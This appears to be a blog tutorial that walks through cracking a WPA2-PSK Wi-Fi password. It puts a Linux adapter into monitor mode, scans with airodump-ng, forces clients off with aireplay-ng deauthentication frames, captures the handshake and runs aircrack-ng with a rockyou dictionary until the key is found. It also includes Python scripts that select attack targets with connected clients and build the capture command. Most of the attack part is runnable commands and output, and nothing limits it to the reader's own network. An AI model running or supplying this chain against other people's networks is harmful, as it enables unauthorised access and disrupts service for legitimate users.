Wireless Wi-Fi networks are everywhere these days. Many users think about the security of their networks and computers, and sometimes they ask how Wi-Fi gets hacked and how real the threat is.
In this post I invite ordinary users, who may be far from wireless security auditing, to look at their own Wi-Fi network through an attacker's eyes and see what hacking Wi-Fi actually involves.
Although the material below is presented in the simplest language possible, a few concepts specific to Wi-Fi auditing cannot be avoided.
Wi-Fi terminology
An access point (AP) is the device that provides the Wi-Fi network to which clients connect. The most common access points are home routers.
Client (Station, STA) - a device that connects to the Access Point: a computer, laptop, mobile phone and so on.
ESSID and SSID are the names of Wi-Fi wireless networks; they are what you see when choosing which network to connect to. Strictly speaking, ESSID and SSID are not the same thing, but the terms are used interchangeably in Wi-Fi testing. In the screenshot below, the ESSIDs (network names) are MiAl, wifi88, etc.:
BSSID is the MAC address of the access point's wireless interface, a value such as 50:46:5D:6E:8C:20. Tools identify an access point by its BSSID rather than by its name, because several APs can share the same ESSID.
A handshake is the exchange of frames between a station and an access point when a Wi-Fi connection is established (for WPA/WPA2 this is the 4-way handshake). The captured frames contain enough information (the two MAC addresses, both sides' nonces and a MIC computed from the password) to test password guesses offline, without any further interaction with the network.
Brute force is a password attack that tries every possible password. It is time consuming and requires a lot of computing power.
Dictionary attack is a password attack that tries candidates from a list of common passwords. It needs far fewer resources than exhaustive brute force, but succeeds only if the password is in the list.
Online Wi-Fi password brute force tries to connect to the access point with one candidate password after another. It is practically never used because it is extremely slow: every attempt is a full association and handshake with the AP, which takes on the order of a second. Its only advantage is that it does not require an adapter that supports monitor mode.
WPA and WPA2 (Wi-Fi Protected Access) replaced the outdated WEP. WPA3 is newer still and is not covered here.
Wireless Wi-Fi card or wireless Wi-Fi adapter - any network card capable of connecting to a Wi-Fi network. In laptops and phones they are built in; in desktop computers they are usually an external device connected via USB.
In monitor mode a wireless adapter passes up every frame it hears on the channel, not only those addressed to it.
Network interface - the Linux name for a network card or adapter, for example wlan0.
The Wi-Fi channel is a number that stands for the frequency the access point is currently transmitting on (channel 6, for example, is 2437 MHz in the 2.4 GHz band).
What you need to hack Wi-Fi
- A computer on which Linux can be installed
- Specialized software for Linux; it is free (distributed free of charge and open source)
- A wireless Wi-Fi card that supports monitor mode and, for the deauthentication step, packet injection. A list of suitable adapters is published separately.
- The relevant knowledge and skills, which this article covers.
As already mentioned, the software for monitoring Wi-Fi networks (the aircrack-ng suite used below) is free. It is installed by default in security distributions such as Kali Linux (see the Kali Linux documentation for general information and installation instructions).
As you can see, all the components needed to hack Wi-Fi are easy to obtain. Everything that follows is done in Kali Linux.
Wi-Fi adapter in monitor mode
By default, wireless adapters are in "managed" mode. In this mode, you can connect to the access point as a regular client.
Since the handshake consists of frames that the Station sends to the Access Point and the Access Point sends to the Station (none of which are addressed to us at any stage), we must put our Wi-Fi card into monitor mode so that it can see these frames and save them for later processing.
To enter the commands to switch the Wi-Fi adapter to monitor mode, we need to find the name of the wireless interface . To do this, open a console and enter the command:
Code:
sudo iw dev
The name of the wireless interface is in the line that starts with Interface; in my case it is wlan0. Remember this value, we will need it later.
Monitor mode is not a normal state for the operating system, and programs such as NetworkManager and wpa_supplicant will silently switch the adapter back to managed mode without asking. To stop them interfering, close them with the following two commands (note that this takes down your normal network connectivity until NetworkManager is started again):
Code:
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
Now we can finally put the wireless card into monitor mode. To do this, run the command sequence
Code:
sudo ip link set <INTERFACE> down
sudo iw <INTERFACE> set monitor control
sudo ip link set <INTERFACE> up
replacing <INTERFACE> with the actual name of your wireless interface (mine is wlan0):
Code:
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up
It seems like nothing happened, but typing the command
Code:
sudo iw dev
again shows the same interface, now with the line type monitor, which confirms that the wireless card is in monitor mode.
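The check above (find the interface in iw dev, confirm its type line reads monitor) is easy to automate. The script below is an added example, not code from the original post or from the iw or aircrack-ng projects: it parses the text that iw dev prints and reports which interfaces are still managed and whether the chosen one is in monitor mode. The sample output embedded in it is constructed in the iw dev layout with made-up addresses, and the function names are my own.

```python
"""Verify monitor mode by parsing `iw dev` output (added example)."""
import subprocess

# Constructed `iw dev` output: wlan0 already switched, wlan1 still managed.
SAMPLE_IW_DEV = """phy#0
\tInterface wlan0
\t\tifindex 3
\t\twdev 0x1
\t\taddr 50:46:5d:6e:8c:20
\t\ttype monitor
\t\ttxpower 20.00 dBm
phy#1
\tInterface wlan1
\t\tifindex 4
\t\twdev 0x100000001
\t\taddr 00:11:22:33:44:55
\t\ttype managed
\t\tchannel 6 (2437 MHz), width: 20 MHz, center1: 2437 MHz
"""


def parse_iw_dev(text):
    """Return {interface: {"phy": ..., "addr": ..., "type": ...}}.

    `iw dev` prints one phy#N block per radio; each Interface line is followed
    by indented attribute lines, of which addr and type are the ones we need."""
    phy, iface, result = None, None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("phy#"):
            phy = line
        elif line.startswith("Interface "):
            iface = line.split(None, 1)[1]
            result[iface] = {"phy": phy, "addr": None, "type": None}
        elif iface and line.startswith("addr "):
            result[iface]["addr"] = line.split(None, 1)[1]
        elif iface and line.startswith("type "):
            result[iface]["type"] = line.split(None, 1)[1]
    return result


def in_monitor_mode(text, iface):
    """True only if the interface exists and its type line says monitor."""
    return parse_iw_dev(text).get(iface, {}).get("type") == "monitor"


def managed_interfaces(text):
    """Interfaces that still need the ip link down / iw set monitor / ip link up
    sequence from the post (or that a daemon has silently switched back)."""
    return [name for name, info in parse_iw_dev(text).items()
            if info["type"] == "managed"]


def main(iface="wlan0"):
    # Live check on this host; listing interfaces with `iw dev` needs no root.
    out = subprocess.run(["iw", "dev"], capture_output=True, text=True,
                         check=True).stdout
    state = "monitor" if in_monitor_mode(out, iface) else "NOT monitor"
    print(f"{iface}: {state}; still managed: {managed_interfaces(out)}")


if __name__ == "__main__":
    main()
```

Run it after the three ip link / iw commands; if the interface shows up as managed again, a network daemon has reset it and airmon-ng check kill needs to be repeated before continuing.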
Handshake
As already mentioned, the handshake is the data exchanged between the Station and the Access Point when the Station connects. To capture it we must tune to the channel the access point operates on, listen to the radio and wait for a Station to connect. Because the wait can be long, a technique called a deauthentication attack is used: forged deauthentication frames force the Station to drop its connection to the access point. The Station immediately tries to reconnect, and at that moment we capture the handshake.
This method does not work if no one is connected to the Access Point: the handshake is only produced when a station that knows the password joins, so with no clients there is nothing to capture.
Wi-Fi networks
To attack a Wi-Fi network, we need to know some of its characteristics. To get a list of all Wi-Fi networks available in range, run the command:
Code:
sudo airodump-ng wlan0
Please note that if you have a different name for the wireless interface, then instead of wlan0 you need to enter this name.
The described attack applies only to networks protected with WPA or WPA2 using a pre-shared key (WPA-PSK, "Personal"), which is the overwhelming majority of home networks. WPA3-only networks use SAE, whose handshake cannot be attacked offline this way, and WPA/WPA2 Enterprise (802.1X) networks have no shared password to guess.
A list of networks like the following will be displayed:
When you see the network you want to attack in the list, stop the program by pressing CTRL + c.
Let's say I'm interested in the network with ESSID (name) dlink. As the screenshot shows, its characteristics are: BSSID 00:1E:58:C6:AC:FB, WPA2, channel 6. In addition, a nonzero #Data value (data frames captured from this AP) suggests that one or more stations are connected to it.
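The same selection (a WPA/WPA2 network that currently has a client, identified by a station whose BSSID column matches the AP) can be made from the capture-01.csv file that airodump-ng writes next to the .cap. The script below is an added example, not code from the original post or from the aircrack-ng project: it parses the two tables in that file, keeps only APs whose handshake can be cracked offline and that have at least one associated station, and builds the airodump-ng command for the next step. The CSV embedded in it is constructed in the airodump-ng layout using the BSSID and ESSID from this post plus made-up neighbouring networks, and the helper names are my own.

```python
"""Pick handshake targets from an airodump-ng CSV (added example)."""
import csv
import re
import sys

# Constructed sample in the airodump-ng CSV layout: AP table, blank line,
# station table. Only the dlink BSSID/ESSID come from the post.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1E:58:C6:AC:FB, 2020-09-30 08:17:00, 2020-09-30 08:24:00,  6,  54, WPA2, CCMP, PSK, -50,      120,       14,   0.  0.  0.  0,   5, dlink,
AA:BB:CC:00:11:22, 2020-09-30 08:17:01, 2020-09-30 08:24:00, 11,  54, WPA2, CCMP, PSK, -70,       80,        0,   0.  0.  0.  0,   6, wifi88,
AA:BB:CC:00:33:44, 2020-09-30 08:17:02, 2020-09-30 08:24:00,  1,  54, WPA3, CCMP, SAE, -60,       50,        0,   0.  0.  0.  0,   4, MiAl,
AA:BB:CC:00:55:66, 2020-09-30 08:17:03, 2020-09-30 08:24:00,  3,  54, OPN,     ,    , -65,       40,        0,   0.  0.  0.  0,   5, guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
50:46:5D:6E:8C:20, 2020-09-30 08:18:00, 2020-09-30 08:24:00, -40,       33, 00:1E:58:C6:AC:FB, dlink
AA:BB:CC:00:77:88, 2020-09-30 08:19:00, 2020-09-30 08:23:00, -65,        2, (not associated) , wifi88,home
"""


def _parse_table(block):
    """One airodump-ng table -> list of dicts keyed by the stripped header."""
    rows = [r for r in csv.reader(block.splitlines()) if r]
    header = [h.strip() for h in rows[0]]
    out = []
    for row in rows[1:]:
        fields = [f.strip() for f in row]
        # airodump-ng does not quote, so a station that probed several ESSIDs
        # spills extra commas into the last column; fold them back into it.
        if len(fields) > len(header):
            fields = fields[:len(header) - 1] + [",".join(fields[len(header) - 1:])]
        out.append(dict(zip(header, fields)))
    return out


def parse_airodump_csv(text):
    """Return (access_points, stations); the file separates them with a blank line."""
    ap_block, sta_block = re.split(r"\r?\n\s*\r?\n", text.strip(), maxsplit=1)
    return _parse_table(ap_block), _parse_table(sta_block)


def handshake_targets(text):
    """APs whose 4-way handshake can be captured and cracked offline: WPA or
    WPA2 (WPA3-only SAE and OPN/WEP are excluded) with a connected station."""
    aps, stations = parse_airodump_csv(text)
    clients = {}
    for sta in stations:          # "(not associated)" rows simply never match an AP
        clients.setdefault(sta["BSSID"], []).append(sta["Station MAC"])
    targets = []
    for ap in aps:
        if not set(ap["Privacy"].split()) & {"WPA", "WPA2"}:
            continue
        if ap["BSSID"] not in clients:
            continue
        targets.append({"bssid": ap["BSSID"], "essid": ap["ESSID"],
                        "channel": int(ap["channel"]), "privacy": ap["Privacy"],
                        "stations": clients[ap["BSSID"]]})
    return targets


def capture_command(target, iface, prefix="capture"):
    """The airodump-ng invocation from the post for this target."""
    return ["airodump-ng", "-c", str(target["channel"]), "--bssid",
            target["bssid"], "-w", prefix, iface]


if __name__ == "__main__":
    # usage: python3 targets.py capture-01.csv [wlan0]; no file -> the sample above
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CSV
    iface = sys.argv[2] if len(sys.argv) > 2 else "wlan0"
    for t in handshake_targets(text):
        print(t["essid"], t["bssid"], "ch", t["channel"], "clients", t["stations"])
        print("  ", " ".join(capture_command(t, iface)))
```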
To capture a handshake, use the following command:
Code:
sudo airodump-ng -c CHANNEL --bssid MAC_ADDRESS -w FILE INTERFACE
Where:
- CHANNEL is the channel on which the AP operates
- MAC_ADDRESS is the BSSID of the attacked AP
- FILE - the name of the file where the handshake will be written
- INTERFACE - the name of the wireless interface in monitor mode
For my data, the command looks like this:
Code:
sudo airodump-ng -c 6 --bssid 00:1E:58:C6:AC:FB -w capture wlan0
The next screenshot shows the AP we are interested in again, and now the station section is visible as well:
In the full list of access points the station section was also present, but it went beyond the bottom edge of the screen and so is not in the screenshot.
For the station, the BSSID column shows the access point's BSSID, 00:1E:58:C6:AC:FB, which means this station is currently connected to the AP we are interested in. There are now two options:
1) wait until the Station disconnects and reconnects to the AP for natural reasons
2) perform a deauthentication attack to speed up the process
Deauthentication attack
To perform the deauthentication without stopping the capture started in the previous step, open a new console window and enter a command of the following form. It sends forged deauthentication frames in the AP's name, so the adapter must support injection; the attack is disruptive, is easily spotted by wireless intrusion detection, and has no effect on networks that enforce 802.11w protected management frames.
Code:
sudo aireplay-ng -0 3 -a MAC_ADDRESS INTERFACE
Where:
- MAC_ADDRESS is the BSSID of the attacked AP
- INTERFACE - the name of the wireless interface in monitor mode
For my data, the command looks like this:
Code:
sudo aireplay-ng -0 3 -a 00:1E:58:C6:AC:FB wlan0
The program will output something like this:
Code:
08:17:30 Waiting for beacon frame (BSSID: 00:1E:58:C6:AC:FB) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
08:17:30 Sending DeAuth to broadcast -- BSSID: [00:1E:58:C6:AC:FB]
08:17:30 Sending DeAuth to broadcast -- BSSID: [00:1E:58:C6:AC:FB]
08:17:31 Sending DeAuth to broadcast -- BSSID: [00:1E:58:C6:AC:FB]
In the airodump-ng window, a new entry will appear in the top right corner:
Code:
WPA handshake: 00:1E:58:C6:AC:FB
This means the handshake has been captured. If it does not appear, the deauthentication frames may not have reached the client: run aireplay-ng again, or aim it at the client directly with -c <station MAC> as its own hint suggests. Once the handshake is recorded, stop airodump-ng with CTRL + c.
Dictionary attack
Now the captured handshake can be attacked offline: each word in a dictionary is tested against it without sending anything to the network.
Let's prepare a dictionary:
Code:
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
sort -u rockyou.txt | pw-inspector -m 8 -M 63 > newrockyou.txt
The dictionary file in this case is called newrockyou.txt.
To find out the name of the captured handshake, run the command:
Code:
ls -l capture*
This will display something like the following (there may be more records if you have repeatedly captured handshakes):
Code:
-rw-r--r-- 1 root root 73164 Sep 30 08:24 capture-01.cap
-rw-r--r-- 1 root root   478 Sep 30 08:24 capture-01.csv
-rw-r--r-- 1 root root   583 Sep 30 08:24 capture-01.kismet.csv
-rw-r--r-- 1 root root  2766 Sep 30 08:24 capture-01.kismet.netxml
We are only interested in the capture-01.cap file, which contains the handshake.
To iterate over the dictionary, use the following command:
Code:
aircrack-ng -w DICTIONARY_FILE CAPTURE_FILE
So, in my case, the exact command is as follows:
Code:
aircrack-ng -w newrockyou.txt capture-01.cap
This starts the password search; while it runs, aircrack-ng shows the current candidate and the key rate. For every word it derives the PMK with PBKDF2 (4096 SHA-1 iterations) and checks it against the captured handshake, which limits a CPU to a few thousand keys per second per core; GPU crackers such as hashcat do the same work much faster.
Password found:
The line KEY FOUND! [pattayateam] shows that the password for the Wi-Fi network is pattayateam. With this password you can connect to the access point from any device (computer, phone), just as legitimate users do.